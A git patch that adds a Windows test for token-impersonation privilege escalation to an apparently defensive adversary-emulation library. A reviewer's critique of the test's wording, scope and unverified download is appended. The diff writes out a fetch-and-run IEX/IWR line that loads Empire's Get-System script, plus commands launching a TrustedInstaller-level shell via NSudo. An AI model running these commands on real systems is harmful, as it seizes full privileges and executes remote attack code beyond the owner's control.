From 3283daa547ff9a7b2d8e591bc292c2e7e6ea0c9c Mon Sep 17 00:00:00 2001
From: BlueDragon-01 <101390770+BlueDragon-01@users.noreply.github.com>
Date: Mon, 22 Aug 2022 09:48:45 -0500
Subject: [PATCH] Update T1134.001.yaml (#2091)

Launches the NSudo executable for a short period of time and then exits.
NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
---
 atomics/T1134.001/T1134.001.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)

diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml
index 2d0248d3..88716836 100644
--- a/atomics/T1134.001/T1134.001.yaml
+++ b/atomics/T1134.001/T1134.001.yaml
@@ -29,3 +29,31 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
     name: powershell
   elevation_required: true
+- name: Launch NSudo Executable
+  description: |-
+    Launches the NSudo executable for a short period of time and then exits.
+    NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+  supported_platforms:
+  - windows
+  input_arguments:
+    nsudo_path:
+      description: 'Path to the NSudo bat file'
+      type: Path
+      default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      NSudo.bat must exist in the specified path #{nsudo_path}
+    prereq_command: |
+      if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+      Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+      Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+      Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+  executor:
+    command: |
+      Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+      Start-Sleep -Second 5
+      Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+    name: powershell
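Review bot: The input-argument and dependency text describe a "bat file" (`'Path to the NSudo bat file'`, `NSudo.bat must exist in the specified path`) while the default and the executor use `NSudoLG.exe`, so the prereq wording misleads anyone overriding `nsudo_path`; change them to `description: 'Path to the NSudo executable (NSudoLG.exe)'` and `NSudoLG.exe must exist in the specified path #{nsudo_path}`. The new executor also omits `elevation_required: true`, which the preceding test in this hunk sets and which the `-U:T` (TrustedInstaller) launch presumably needs to succeed rather than fail silently behind a UAC prompt. `Stop-Process -Name "cmd"` terminates every cmd.exe on the host, not only the one NSudo spawned, so the test has collateral impact on a shared machine; capturing the spawned process with `-PassThru` and stopping it by Id would scope the cleanup, and a `cleanup_command` removing the extracted `$env:TEMP\NSudo_8.2_All_Components` directory would leave the host as found. Finally, `get_prereq_command` expands an unverified internet download and the test then runs it with full privileges; comparing `Get-FileHash` output against a pinned value (placeholder: EXPECTED_SHA256 from the release) before `Expand-Archive` would keep the test from executing a tampered archive.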